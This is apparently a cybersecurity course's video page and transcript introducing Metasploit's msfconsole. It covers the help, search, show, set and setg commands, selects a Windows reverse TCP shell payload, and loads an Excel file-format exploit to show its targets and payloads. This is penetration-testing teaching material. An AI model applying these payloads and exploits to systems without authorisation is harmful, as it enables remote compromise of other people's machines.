Part 4 - The msfconsole Interface
Video Activity
Dean goes over the using the msfconsole and some of the major commands you can run from within it such as help, search, set, and show. You will use the help command frequently to enumerate the options associated with commands within the Metasploit framework. The search and show commands can be used in tandem to discover and explore various exploits...
Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or
Already have an account? Sign In »
Video Description
Dean goes over the using the msfconsole and some of the major commands you can run from within it such as help, search, set, and show. You will use the help command frequently to enumerate the options associated with commands within the Metasploit framework. The search and show commands can be used in tandem to discover and explore various exploits and payloads provided by Metasploit. This comes in very handy when looking for vulnerabilities in applications to exploit for specific OSes such as Excel under an MS Windows target.
Video Transcription
00:03
>> We'll look into some of the database options
00:03
here a little bit later.
00:03
One thing we can do since we know
00:03
that the database is already set up,
00:03
I can run the "DB status" command.
00:03
That lets me double-check.
00:03
I can see that I'm connected to MSF 3,
00:03
which is the name of the instance
00:03
but what I'm really interested in showing is some of
00:03
the other commands that
00:03
Metasploit gives within the framework to do your work.
00:03
We'll get a chance to explore most of these,
00:03
not everything of course,
00:03
but on any particular command.
00:03
For instance, let's say I want to
00:03
look at the help for a particular command like Load.
00:03
I just type "Help" and the name of
00:03
the command and it tells me a little bit about.
00:03
It gives me some extra information.
00:03
I can try this for another command, like Loot.
00:03
We'll get a chance to look at
00:03
what loop does a little bit later as well
00:03
but you get the basic idea.
00:03
You have some usage information,
00:03
some command-line options while
00:03
you're inside the framework itself.
00:03
Some of the other commands to think about
00:03
once we are using the tool,
00:03
I will demonstrate some of the commands as we go
00:03
but a quick scan of
00:03
the help directory gives
00:03
you an idea of some of the possibilities.
00:03
We can do things like load a payload,
00:03
we can use an exploit,
00:03
we can connect to a command shell,
00:03
we can send a process to the background
00:03
>> if we wanted to.
00:03
>> There's lots of different possibilities here.
00:03
We're going to poke around
00:03
the interface a little bit more.
00:03
I'm going to just simulate the beginnings of doing
00:03
some other exploit work
00:03
just to show how some of
00:03
the features in the interface work.
00:03
For instance, I could decide I want to do
00:03
a search for a particular type
00:03
of exploit so I can run the search command.
00:03
The one I want is
00:03
going to contain the text "Reverse_TCP".
00:03
That should turn up a lot of actual choices.
00:03
One of the ones I might be interested in among
00:03
all the available options here is this one,
00:03
reverse TCP shell to a Windows machine.
00:03
We can see that its ranking is normal.
00:03
It's a Windows command shell,
00:03
Reverse TCP Stager,
00:03
we'll talk about what that means a little bit later
00:03
but these rankings helped me to decide
00:03
if the payload that I want to
00:03
use has an excellent chance or a good chance or
00:03
a great chance of being successful.
00:03
Most of these are showing up as normal.
00:03
Sure, If I were to scroll,
00:03
so I've got some here that are
00:03
average, some that are good
00:03
but the one that I want to use as an example,
00:03
I'll just go ahead and use this normal one.
00:03
I'm going to right-click, copy that,
00:03
and I can paste it right in. Go ahead and use that.
00:03
Now you'll notice that the prompt changes to red,
00:03
that shows me that I'm in
00:03
the payload reverse TCP for Windows.
00:03
I'm going to use
00:03
the "Back" command to back out of what I just did.
00:03
To show your different way to do this,
00:03
maybe I have some idea of what
00:03
the payload or the exploit is,
00:03
so I can just start typing and use "Tab complete".
00:03
So PAY tab, I get payload,
00:03
start typing "Windows",
00:03
hit "Tab", I get Windows.
00:03
I know it might be the shell directory
00:03
and it's probably reverse.
00:03
Now it looks like I had more than one option here,
00:03
I'll just start typing "T",
00:03
I hit "Tab", and I get reverse TCP.
00:03
Now I've got the payload ready to configure.
00:03
One of the powerful commands is the "Show" command.
00:03
Show lets you look at lots of different things.
00:03
If I run Show without any arguments,
00:03
I'll get every single payload,
00:03
every single exploit,
00:03
pretty much all of the framework functionality.
00:03
I can also narrow that
00:03
down by running Show to just show me
00:03
exploits or show me payloads or show me
00:03
no operations or no information.
00:03
I can also run
00:03
Show options if I
00:03
want to see the options for this particular exploit.
00:03
What it's looking for is an exit function.
00:03
Some of the options are predefined,
00:03
some options are not.
00:03
For instance, L host stands for local host,
00:03
L port for local port.
00:03
A lot of options that you'll see.
00:03
We'll have R host for
00:03
remote host or R port for remote port
00:03
but in this case, I've just got L host to deal with.
00:03
The way that I can put a value
00:03
in or put a setting into
00:03
this option is to use the set command.
00:03
I can say, set L host.
00:03
I want to make it my local machine,
00:03
so I'll type in that IP address.
00:03
Now if I run set options again,
00:03
I'm having a hard time spelling today.
00:03
Not set options, show options.
00:03
I can see that L host is now set.
00:03
Another useful feature when we see this right
00:03
here is using the -G option.
00:03
What I'll do is I'll back
00:03
out of that particular payload now,
00:03
that one's no longer being used,
00:03
those options that I've set have been removed.
00:03
I can go ahead and
00:03
use my up arrow to go
00:03
back to that command I run earlier,
00:03
I'll go back into the same payload.
00:03
Notice the prompt changes again
00:03
but now what I can do is I can use
00:03
a set G command for my L host.
00:03
Set G is the setting
00:03
for that particular variable to be a global setting.
00:03
For instance, if you're doing a bunch of
00:03
work and you've got a target that's
00:03
a particular remote host or
00:03
a particular local host like your
00:03
>> Kelly instance itself,
00:03
>> it makes more sense to use the set G or set
00:03
-G. That way you don't have
00:03
to set this every single time.
00:03
You'll notice because I set this parameter,
00:03
if I do Show options, it's there.
00:03
If I were to go back out of this
00:03
and go into a different payload,
00:03
I would find that that local host variable has
00:03
also been set globally.
00:03
I can also unset.
00:03
Just like set G,
00:03
I can use unset G for L host.
00:03
Now that parameter is unset,
00:03
that variable's no longer there.
00:03
Well, it's unset from
00:03
a global set or from a global stage.
00:03
I would have to unset it specifically
00:03
within this plugin for that to go away.
00:03
Now you'll notice that it's missing.
00:03
Two options. It's a local setting for the variable.
00:03
If you back out of your payload,
00:03
>> those settings are gone.
00:03
>> Or the global setting which lets you have
00:03
those values persist while
00:03
you're doing your different activities.
00:03
We have a search command also.
00:03
Let me back out of this,
00:03
search lets me do things like
00:03
look for reverse TCP, for instance.
00:03
I'm going to get a lot of hits on this search because
00:03
a lot of reverse TCP options are available
00:03
but I can also do things
00:03
like search for a particular platform.
00:03
Let's say I only want to look for OSX exploits.
00:03
You'll notice that the OSX shows up.
00:03
Some of these are multiple platforms,
00:03
so you'll see the word multi there.
00:03
As you start to play around with the interface,
00:03
this will become a little bit more natural
00:03
and intuitive to see
00:03
what it is that you're actually looking at
00:03
but it's a nice feature.
00:03
I can search for Windows, for instance, exploits.
00:03
These are nice features and we can
00:03
also do a help
00:03
on the search command to see what
00:03
the different options are.
00:03
For instance, I can search
00:03
for let's say, a particular author.
00:03
I don't know any authors off the top of my head,
00:03
so maybe that's not the best one to try
00:03
but we can try searching for a name,
00:03
which I've already shown,
00:03
but also the type.
00:03
I can say, search for
00:03
a post exploit that has the word TCP in it.
00:03
That's going to give me a lot of hits
00:03
but you get the basic idea of
00:03
how powerful the interface can be.
00:03
I can also use the Show command.
00:03
If I run this without any arguments,
00:03
I'll get all of the items that
00:03
>> Metasploit has available
00:03
>> but I can also run like let's say I
00:03
wanted to search for all of them,
00:03
rather than I search for show all of my payloads.
00:03
I can see all of those. This gives
00:03
you a little bit more of
00:03
an idea of what kind
00:03
of functionality is really built into the framework.
00:03
It's quite extensive, it's quite complex.
00:03
It seems a little bit overwhelming at
00:03
first, and that's normal.
00:03
As you get more familiar,
00:03
as we start to go through more of these functions,
00:03
it'll be a little bit more clear.
00:03
Okay, let's look a little further
00:03
into interacting with some of
00:03
the payloads and other things to see
00:03
just some of the mechanics of
00:03
>> getting yourself situated.
00:03
>> We'll go into more detail, of course,
00:03
a little bit later as to
00:03
how to select your target and
00:03
what vulnerabilities to look for.
00:03
Let's say my endpoints system,
00:03
maybe there's a suspicion
00:03
that there might be an Excel vulnerability
00:03
>> I can exploit.
00:03
>> Maybe I know that it's a Windows system
00:03
and I can take advantage of that.
00:03
One of the things I can do is I can
00:03
do a search for Excel.
00:03
I've got one here that looks to be good rank,
00:03
Microsoft Excel malformed
00:03
feet-header record vulnerability.
00:03
This one looks good.
00:03
I'm going to go ahead and use this.
00:03
I'll type "Use".
00:03
Remember, I can just start typing and do
00:03
tab-complete exploit when tab-complete file
00:03
format [inaudible] nine and eventually I'll get
00:03
there or just copy and paste
00:03
wherever you think is faster for your own use.
00:03
I'll go ahead and now. I'm in this feat-header exploit.
00:03
I can show my options as we've seen
00:03
before just to see what's available to me.
00:03
I could also do some other interesting things.
00:03
I can show my targets.
00:03
What are the applicable targets
00:03
for this particular exploit?
00:03
I can see I've got Microsoft Office 2002, 2003, 2007.
00:03
There's some interesting options there.
00:03
I can also show
00:03
the payloads that this particular exploit might use.
00:03
A lot of different choices for this particular payload
00:03
that I can attach to
00:03
my exploit to take advantage of this vulnerability.
00:03
I might be able to also find
00:03
some advanced options for this particular exploit.
00:03
There's my exploit again and I've
00:03
got other things here like the payload handler,
00:03
the different encoding methods, and so on.
00:03
There's lots of options of show evasion.
00:03
That's not going to show me
00:03
anything for this particular one,
00:03
but it gives you some clues for
00:03
IDS evasion that we'll explore a little bit later.
Up Next
Similar Content
